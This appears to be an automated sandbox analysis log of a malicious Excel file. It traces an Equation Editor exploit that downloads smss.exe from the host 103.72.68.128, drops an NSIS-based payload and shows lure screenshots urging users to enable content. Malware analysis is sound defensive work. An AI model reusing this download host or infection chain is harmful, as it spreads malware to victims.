    Source: audiodgse.exe, audiodgse.exe, 00000005.00000000.413248475.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe, 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmp, audiodgse.exe, 0000000A.00000000.476233399.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: audiodgse.exe, 00000005.00000000.413248475.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe, 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmp, audiodgse.exe, 0000000A.00000000.476233399.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drString found in binary or memory: http://s.symcd.com06
    Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
    Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
    Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3A46B79.emfJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035303C0 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035303C0
    Source: global trafficHTTP traffic detected: GET /S1510M/smss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.72.68.128Connection: Keep-Alive
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0040523F

    System Summary

    barindex
    Source: Screenshot number: 4Screenshot OCR: document is protected 15 mcnwy m & Soc 16 17 G0~ D0cuk Nm 18 4jozlu633 m & Soc. 19 20
    Source: Screenshot number: 8Screenshot OCR: document is protected 15 mcnwy Ma &50c. 16 17 18 4jDm46jj mm Na&S0c- 19 20 GEG
    Source: Screenshot number: 12Screenshot OCR: Enable Editing" from the yellow bar above Once you have enabled editing, please click "Enable Co
    Source: Screenshot number: 12Screenshot OCR: document is protected Document Language: English (US.) Change Convert P " Open the document in
    Source: Screenshot number: 12Screenshot OCR: protected documents If this document was downloaded from your email, please click 3 "Enable Edit
    Source: Screenshot number: 12Screenshot OCR: Enable Content" from the yellow bar above D Create PDF v &j Edit PDF E3 Comment <J Combine File
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsOLE: Microsoft Excel 2007+
    Source: ~DF8C8D6BC10DEDB38C.TMP.0.drOLE: Microsoft Excel 2007+
    Source: ~DF8DCB70E4BFE1EB2B.TMP.0.drOLE: Microsoft Excel 2007+
    Source: 4B430000.0.drOLE: Microsoft Excel 2007+
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\audiodgse.exeJump to dropped file
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403235
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_004066665_2_00406666
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_72BE1A985_2_72BE1A98
    Source: ~DF8C8D6BC10DEDB38C.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~DF8DCB70E4BFE1EB2B.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsOLE indicator, VBA macros: true
    Source: 4B430000.0.drOLE indicator, VBA macros: true
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsReversingLabs: Detection: 34%
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsVirustotal: Detection: 48%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe"
    Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe" Jump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe" Jump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
    Source: .LNK.0.drLNK file: ..\..\..\..\..\Desktop\#U4e5d#U6708#U58f0#U660e_40981677.xls
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403235
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8564.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@22/46@0/3
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_00402138 CoCreateInstance,MultiByteToWideChar,5_2_00402138
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_004044FA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,5_2_004044FA
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsOLE indicator, Workbook stream: true
    Source: 4B430000.0.drOLE indicator, Workbook stream: true
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile written: C:\Users\user\AppData\Local\Temp\reinhold.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsStatic file information: File size 1282048 > 1048576
    Source: ~DF8C8D6BC10DEDB38C.TMP.0.drInitial sample: OLE indicators vbamacros = False

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000005.00000002.1051412581.00000000087F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_72BE2F60 push eax; ret 5_2_72BE2F8E
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_72BE1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,5_2_72BE1A98
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\audiodgse.exeJump to dropped file
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035303C0 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035303C0
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\KoalitionensJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\DagtjenestenJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\KwannonJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\DissympathisesJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\ReformattingJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Spongiform.ForJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Megapterine.bucJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Engroshandlerne.agrJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\haves.antJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\laggin.telJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\regneoperatorers.txtJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\UnconstraintJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\OpskolingersJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers\unintriguing.tieJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
